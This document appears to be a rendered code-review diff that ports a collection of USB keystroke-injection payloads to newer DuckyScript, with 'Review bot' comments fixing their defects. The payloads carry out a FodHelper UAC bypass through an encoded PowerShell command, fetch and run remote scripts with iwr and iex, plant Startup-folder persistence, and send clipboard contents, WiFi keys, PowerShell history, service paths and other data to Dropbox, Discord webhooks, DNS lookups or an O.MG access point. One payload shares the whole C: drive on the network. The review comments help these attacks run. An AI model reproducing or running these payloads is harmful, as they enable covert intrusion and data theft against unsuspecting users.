STRING pAGQAZABlAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit
DELAY 100
ENTER
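Review bot: The old version typed the `-enc` blob as a series of STRING chunks with `DELAY 200` between them, which is the usual workaround for dropped characters when a long string is injected in one go; the new single `STRINGLN powershell.exe -enc ...` removes that pacing, so confirm it types correctly on the target before merging. The encoded argument on the new side is elided in this rendering, so the diff cannot be checked here for a byte-for-byte match with the removed chunks.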

View File

@ -1,22 +1,16 @@
REM FodCableII REM_BLOCK
REM Version 1.0 FodCableII
REM OS: Windows Version 1.0
REM Author: 0iphor13 OS: Windows
REM Requirements: OMG Firmware v.2.5 or higher Author: 0iphor13
Requirements: OMG Firmware v.2.5 or higher
Using FodHelper.exe to bypass UAC and get an elevated shell
END_REM
REM Using FodHelper.exe to bypass UAC and get an elevated shell
DELAY 500
DUCKY_LANG de DUCKY_LANG de
DELAY 1500 DELAY 2000
GUI r GUI r
STRINGLN powershell -NoP -NonI
DELAY 500 DELAY 500
STRING powershell -NoP -NonI STRINGLN powershell.exe -enc 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;exit
DELAY 500
ENTER
DELAY 500
STRING powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBD
STRING AFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBh
STRING AHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
DELAY 200
ENTER
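Review bot: The 500 ms wait between `GUI r` and typing into the Run dialog was moved to after `STRINGLN powershell -NoP -NonI`, so the command is now typed the instant the Run shortcut is sent, with no time for the dialog to open; keep a `DELAY 500` before the first STRINGLN as well as the one after it (the old script had both). As with the other fodhelper file, the new `-enc` argument is elided in this view, so its equivalence to the three removed STRING chunks cannot be verified from the diff.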

View File

@ -1,189 +1,88 @@
REM Title: Hard_Con_Exfil REM_BLOCK
REM Author: LulzAnarchyAnon Title: Hard_Con_Exfil
REM Description: This payload navagates it's way to Hardware, and Connection properties. Author: LulzAnarchyAnon
REM It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder. Description: This payload navagates it's way to Hardware, and Connection properties.
REM It is then exfiltrated via a DropBox Upload. It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder.
REM Target: Windows 10 It is then exfiltrated via a DropBox Upload.
REM Props: Darren Kitchen Target: Windows 10
REM Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script! Props: Darren Kitchen
REM Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads. Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script!
REM Props: Don't forget to Like and Subscribe! Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads.
REM Version: 1.0 Props: Don't forget to Like and Subscribe!
REM Category: Exfiltration Version: 1.0
Category: Exfiltration
REM This payload may need minor adjustments to run properly depending on This payload may need minor adjustments to run properly depending on
REM Attacker, and Target devices. Attacker, and Target devices.
REM In the First stage the targets data is saved to the target device. In the First stage the targets data is saved to the target device.
REM In the Second stage the loot is uploaded via dropbox. In the Second stage the loot is uploaded via dropbox.
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
REM Stage 1 REM Stage 1
GUI GUI
DELAY 100 STRINGLN network properties
STRING network properties REPEAT 3 TAB
DELAY 200
ENTER ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 1000
ENTER
DELAY 500
GUI r GUI r
DELAY 500 STRINGLN notepad
STRING notepad
ENTER
DELAY 500
CTRL v CTRL v
DELAY 500
CTRL s CTRL s
DELAY 500
ALT d ALT d
DELAY 500 STRINGLN %USERPROFILE%\Downloads
STRING %USERPROFILE%\Downloads REPEAT 6 TAB
DELAY 500 STRINGLN targetloot
ENTER REPEAT 2 ALT F4
DELAY 200
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
STRING targetloot
DELAY 100
ENTER
DELAY 100
ALT F4
DELAY 100
ALT F4
DELAY 2000 DELAY 2000
REM Stage 2 REM Stage 2
GUI r GUI r
DELAY 200
STRING powershell STRING powershell
DELAY 200
ENTER ENTER
DELAY 2000 DELAY 2000
STRING function DropBox-Upload { STRINGLN function DropBox-Upload {
STRINGLN [CmdletBinding()]
DELAY 500 STRINGLN param (
ENTER STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
STRINGLN [Alias("f")]
STRING [CmdletBinding()] STRINGLN [string]$SourceFilePath
DELAY 500 STRINGLN )
ENTER STRINGLN $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
STRING param ( STRINGLN "
STRINGLN " # Replace with your DropBox Access Token
DELAY 500 STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
ENTER STRINGLN $TargetFilePath="/$outputFile"
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)] STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500 STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
ENTER STRINGLN $headers.Add("Authorization", $authorization)
STRING [Alias("f")] STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500 STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
ENTER STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
STRING [string]$SourceFilePath
DELAY 500
ENTER
STRING )
DELAY 500
ENTER
STRING $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
DELAY 500
ENTER
STRING "
DELAY 500
ENTER
STRING" # Replace with your DropBox Access Token
DELAY 500
ENTER
STRING $outputFile = Split-Path $SourceFilePath -leaf
DELAY 500
ENTER
STRING $TargetFilePath="/$outputFile"
DELAY 500
ENTER
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
DELAY 500
ENTER
STRING $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500
ENTER
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
DELAY 500
ENTER
STRING $headers.Add("Authorization", $authorization)
DELAY 500
ENTER
STRING $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500
ENTER
STRING $headers.Add("Content-Type", 'application/octet-stream')
DELAY 500
ENTER
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
DELAY 500
ENTER
STRING } STRING }
DELAY 5000 DELAY 5000
GUI r GUI r
DELAY 200 STRINGLN %USERPROFILE%\Downloads\
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRING targetloot STRING targetloot
DELAY 1000
GUI r GUI r
DELAY 500 STRINGLN %USERPROFILE%\Downloads\
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRING targetloot STRING targetloot
DELAY 500
ALT h ALT h
DELAY 200 REPEAT 5 TAB
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
ENTER ENTER
DELAY 500
ALT F4 ALT F4
DELAY 1000 DELAY 1000
CTRL v CTRL v
DELAY 5000 DELAY 5000
STRING | DropBox-Upload STRINGLN | DropBox-Upload
DELAY 500
ENTER
DELAY 5000 DELAY 5000
ENTER ENTER
ALT F4 ALT F4
DELAY 100
ENTER ENTER
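Review bot: The `$DropBoxAccessToken` assignment is still split across three typed lines (`STRINGLN $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE`, `STRINGLN "`, `STRINGLN " # Replace with your DropBox Access Token`), so the token gets an embedded newline and the third line opens a new, unterminated string that breaks the rest of the function definition; collapse it to one line, `STRINGLN $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE" # Replace with your DropBox Access Token`, or move the placeholder into a `DEFINE` like the other files. Two more issues in this hunk: the Save As dialog originally pressed TAB seven times but `REPEAT 6 TAB` presses it six, and `STRING }` closing the function is still not followed by ENTER (the rest of the file converts STRING+ENTER pairs to STRINGLN), so the function body is never submitted before the later `CTRL v` pastes into the same console line.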

View File

@ -1,16 +1,17 @@
REM Title: Bookmark-Hog REM_BLOCK
Title: Bookmark-Hog
Author: atomiczsec
Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
Target: Windows 10, 11
REM Author: atomiczsec Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky DEFINE #URL <Your Shared link for the intended file>
REM Target: Windows 10, 11
DUCKY_LANG US
DELAY 2000 DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
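Review bot: `STRINGLN ... iwr #URLdl=1; iex $pl` glues `dl=1` onto the macro name, so the expansion depends on whether the firmware recognises `#URL` inside `#URLdl=1`, and the `?` that the REM_BLOCK itself says must precede `dl=1` is missing; write `iwr #URL?dl=1` or include `?dl=1` in the DEFINE value. The `mode con:cols=14 lines=1` fused onto "executed properly" in the REM_BLOCK is leftover text from another payload and should be deleted.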

View File

@ -1,17 +1,19 @@
REM Title: Copy-And-Waste REM_BLOCK
Title: Copy-And-Waste
Author: atomiczsec & I am Jakoby
Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
Target: Windows 10, 11
REM Author: atomiczsec & I am Jakoby Remember to replace the link with your pastebin shared link for the intended files to download
Also remember to put in your discord webhook in c.ps1
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
END_REM
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook DEFINE #URL PASTEBIN LINK FOR BAT
REM Target: Windows 10, 11
DUCKY_LANG US
DELAY 2000 DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download GUI r
REM Also remember to put in your discord webhook in c.ps1 DELAY 100
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URL).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URL).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
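Review bot: The original typed two different links (`PASTEBIN LINK FOR BAT` for l.bat and `PASTEBIN LINK FOR PS1` for c.ps1), but the new STRINGLN uses `#URL` for both `iwr` calls, so both files would be fetched from the same URL; define two macros (for example `#BAT_URL` and `#PS1_URL`) and reference each once. Replacing the bare `GUI` and the valueless `DELAY` with `GUI r` and `DELAY 100` is a correct fix.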

View File

@ -1,101 +1,78 @@
REM -------------------------------------------------------------------- REM_BLOCK
REM Title: O.MG Plug Basic Local Exfiltrator --------------------------------------------------------------------
REM Description: Exfiltrates via O.MG WebSocket API Title: O.MG Plug Basic Local Exfiltrator
REM Author: thisismyrobot Description: Exfiltrates via O.MG WebSocket API
REM Target: Windows 10 (PowerShell) Author: thisismyrobot
REM Version: 1.0 Target: Windows 10 (PowerShell)
REM Category: Exfiltration Version: 1.0
REM Category: Exfiltration
REM Local exfiltration for O.MG Plug Basic
REM
REM The Basic version of the Plug cannot do stuff like sharing a local
REM storage device (at least at the time of writing), so this code
REM does local exfil by connecting the target to the O.MG Plug's own
REM WiFi and using WebSockets to save data to a setting.
REM
REM This assumes a WiFi-enabled target of course.
REM
REM Retrieve the data by using the CTList custom command under Debug.
REM
REM Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
REM --------------------------------------------------------------------
Local exfiltration for O.MG Plug Basic
The Basic version of the Plug cannot do stuff like sharing a local
storage device (at least at the time of writing), so this code
does local exfil by connecting the target to the O.MG Plug's own
WiFi and using WebSockets to save data to a setting.
This assumes a WiFi-enabled target of course.
Retrieve the data by using the CTList custom command under Debug.
Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
--------------------------------------------------------------------
END_REM
DEFINE #PASSWORD Secret password
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500 DEFAULT_DELAY 500
GUI r GUI r
DELAY 500 STRINGLN powershell
STRING powershell STRINGLN cd c:\temp
ENTER
DELAY 1000
STRING cd c:\temp
ENTER
REM ----------------------- REM -----------------------
REM Collect info to exfil. REM Collect info to exfil.
REM ----------------------- REM -----------------------
STRING $e = "Secret password" STRING $e = "#PASSWORD"
ENTER ENTER
REM ---------------------------------- REM ----------------------------------
REM Connect to the O.MG AP. REM Connect to the O.MG AP.
REM ---------------------------------- REM ----------------------------------
STRING echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml STRINGLN echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml
ENTER
STRING netsh wlan add profile "profile.xml" STRINGLN netsh wlan add profile "profile.xml"
ENTER
STRING netsh wlan connect name=O.MG STRINGLN netsh wlan connect name=O.MG
ENTER
REM -------------------------------- REM --------------------------------
REM Establish websocket connection. REM Establish websocket connection.
REM -------------------------------- REM --------------------------------
STRING $ws = New-Object Net.WebSockets.ClientWebSocket STRINGLN $ws = New-Object Net.WebSockets.ClientWebSocket
ENTER STRINGLN $ct = New-Object Threading.CancellationToken($false)
STRINGLN $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
STRING $ct = New-Object Threading.CancellationToken($false) STRINGLN do { Sleep(0.1) } until ($connectTask.IsCompleted)
ENTER
STRING $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
ENTER
STRING do { Sleep(0.1) } until ($connectTask.IsCompleted)
ENTER
REM -------- REM --------
REM Upload. REM Upload.
REM -------- REM --------
STRING $ct = New-Object Threading.CancellationToken($false) STRINGLN $ct = New-Object Threading.CancellationToken($false)
ENTER STRINGLN $command = "[custom]CTSet`tcaptured`t$e"
STRINGLN [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
STRING $command = "[custom]CTSet`tcaptured`t$e" STRINGLN $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
ENTER
STRING [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
ENTER
STRING $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
ENTER
DELAY 1000 DELAY 1000
REM ---------- REM ----------
REM Clean up. REM Clean up.
REM ---------- REM ----------
STRING netsh wlan disconnect STRINGLN netsh wlan disconnect
ENTER STRINGLN netsh wlan delete profile name="O.MG"
STRINGLN del .\profile.xml
STRING netsh wlan delete profile name="O.MG" STRINGLN exit
ENTER
STRING del .\profile.xml
ENTER
STRING exit
ENTER
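Review bot: the upload in this hunk sends without checking that the connect actually succeeded. If the O.MG access point is not reachable, `$connectTask` still completes (faulted), `$ws.SendAsync(...)` throws, and the cleanup lines (`netsh wlan disconnect`, `del .\profile.xml`) run regardless, so the captured data in `$e` is silently lost. Wrap the send in a state check such as `if ($ws.State -eq 'Open') { ... }` and only run the cleanup after a successful send. Minor: `Sleep(0.1)` binds 0.1 to the `-Seconds` parameter, which is an integer in Windows PowerShell 5.1 and rounds to 0, making the wait loop a busy spin; `Start-Sleep -Milliseconds 100` is what was intended.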


@ -1,16 +1,17 @@
REM Title: Powershell-History REM_BLOCK
Title: Powershell-History
REM Author: atomiczsec Author: atomiczsec
Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation Target: Windows 10
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
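Review bot: `iwr #URLdl=1` in the last line glues the constant to `dl=1` with no `?` between them, so after substitution the request goes to `<link>dl=1`, while the REM_BLOCK still tells the user to end the link with `?dl=1`; write `iwr #URL?dl=1` and make the DEFINE value a bare URL, because the placeholder `<Your Shared link for the intended file>` contains spaces and angle brackets that a copy-and-paste user may keep. The comment line ending in `executed properlymode con:cols=14 lines=1` also carries a stray `mode con:cols=14 lines=1` fused onto it; drop it or give it its own line, since inside REM_BLOCK it is never executed anyway.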


@ -1,16 +1,20 @@
REM Title: Printer-Recon REM_BLOCK
Title: Printer-Recon
Author: atomiczsec
REM Author: atomiczsec Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network Target: Windows 10
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
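Review bot: same URL defect as the other Dropbox loaders: `iwr #URLdl=1` produces `<link>dl=1` instead of `<link>?dl=1` after DEFINE substitution, contradicting the instruction in the REM_BLOCK; use `iwr #URL?dl=1` and keep the DEFINE value a plain URL without spaces or angle brackets. The `mode con:cols=14 lines=1` text fused onto `executed properly` in the REM_BLOCK is leftover debris and should be removed.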


@ -1,25 +1,20 @@
REM Title: Priv-Paths REM_BLOCK
REM Author: atomiczsec Title: Priv-Paths
REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. Author: atomiczsec
REM Target: Windows 10 Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
Target: Windows 10
END_REM
DEFINE #WEBHOOKURL YOUR-DISCORD-WEBHOOK
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
DELAY 3000
GUI r GUI r
DELAY 1000 STRINGLN cmd
STRING cmd STRINGLN cd %HOMEPATH%
ENTER STRINGLN wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
DELAY 500 STRINGLN curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" #WEBHOOKURL
STRING cd %HOMEPATH% STRINGLN del p.txt
ENTER STRINGLN exit
DELAY 1000
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
ENTER
DELAY 1000
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK
ENTER
DELAY 200
STRING del p.txt
ENTER
DELAY 100
STRING exit
ENTER
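Review bot: the startup sequence is now `DELAY 2000`, `DEFAULT_DELAY 500`, `DELAY 3000` back to back, five seconds of wait where the rest of this commit standardises on a single `DELAY 2000`; one of the two DELAY lines should go. More importantly, the explicit one-second pause that sat between launching `cmd` and typing `cd %HOMEPATH%` has been replaced by the 500 ms default, so the `cd`, the `wmic` query and the `curl.exe` upload may start typing before the console window has focus and end up in the Run dialog instead; keep a longer explicit `DELAY` after `STRINGLN cmd`.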


@ -1,16 +1,18 @@
REM Title: Pwn-Drive REM_BLOCK
Title: Pwn-Drive
REM Author: atomiczsec Author: atomiczsec
Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. Target: Windows 10
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr dl=1; iex $pl
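Review bot: the last line has lost the URL reference entirely: `$pl = iwr dl=1; iex $pl` no longer mentions `#URL`, so the `DEFINE #URL` is unused and the payload runs `iwr dl=1`, which fails. It should read `iwr #URL?dl=1` (with the `?` the REM_BLOCK asks for). The stray `mode con:cols=14 lines=1` fused onto `executed properly` in the REM_BLOCK should also be dropped.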


@ -1,17 +1,22 @@
REM Title: Screen-Shock REM_BLOCK
Title: Screen-Shock
Author: atomiczsec
REM Author: atomiczsec Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) Target: Windows 10
REM Target: Windows 10 Remember to replace the link with your pastebin shared link for the intended files to download
Also remember to put in your discord webhook in c.ps1
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
END_REM
DEFINE #URLBAT PASTEBIN LINK FOR BAT
DEFINE #URLPS1 PASTEBIN LINK FOR PS1
DUCKY_LANG US
DELAY 2000 DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download GUI r
REM Also remember to put in your discord webhook in c.ps1 DELAY 500
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URLBAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URLPS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
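Review bot: the `-Ep Bypass "echo (iwr #URLBAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat"; ..."` one-liner nests unescaped double quotes inside the double-quoted command argument; powershell.exe receives its arguments with those inner quotes stripped, so the path containing `Start Menu` reaches the `>` redirection unquoted and the redirect target is cut at the space. Escape the inner quotes as `\"` so they survive argument parsing. Separately, the REM_BLOCK instructs the user to omit `https://` from the pastebin links; that makes the fetch rely on Windows PowerShell 5.1 accepting a scheme-less URI (PowerShell 7 rejects relative URIs) and starts the request over plain HTTP for content that is written into the Startup folder and executed, so the full `https://pastebin.com/raw/...` form is the safer instruction.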


@ -1,16 +1,21 @@
REM Title: Spotify-Spy REM_BLOCK
Title: Spotify-Spy
REM Author: atomiczsec Author: atomiczsec
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
REM Target: Windows 10 Target: Windows 10
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000 DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
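Review bot: `iwr #URLdl=1` in the last line yields `<link>dl=1` rather than `<link>?dl=1` once `#URL` is substituted, which contradicts the REM_BLOCK's own `?dl=1` instruction; use `iwr #URL?dl=1` and keep the DEFINE value a plain URL. The `mode con:cols=14 lines=1` fragment fused onto `executed properly` inside the REM_BLOCK is debris and should be removed.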

View File

@ -1,3 +1,4 @@
REM_BLOCK
# Title: DNS Exfiltrate WiFi names and preshared key # Title: DNS Exfiltrate WiFi names and preshared key
# Description: Exfiltrates WiFi names and PSK using DNS # Description: Exfiltrates WiFi names and PSK using DNS
# Author: Keld Norman / Twitter: @keld_norman # Author: Keld Norman / Twitter: @keld_norman
@ -20,29 +21,17 @@
# Be aware that exfiltrated WiFi names and code will be send in clear text over the internet.. # Be aware that exfiltrated WiFi names and code will be send in clear text over the internet..
# #
# TODO: This only works for WiFi names without space in the name. # TODO: This only works for WiFi names without space in the name.
# END_REM
DUCKY_LANG US DUCKY_LANG US
REM Target: WINDOWS DELAY 2000
REM Purpose: Exfiltrate all saved WiFi names + PSK via DNS DEFAULT_DELAY 500
DELAY 3000
CONTROL ESCAPE CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER CTRL-SHIFT ENTER
DELAY 1000
ALT Y ALT Y
DELAY 500
ENTER
DELAY 500
STRING @echo off
DELAY 500
ENTER
DELAY 500
STRING for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
DELAY 500
ENTER
DELAY 500
STRING exit
DELAY 500
ENTER ENTER
STRINGLN @echo off
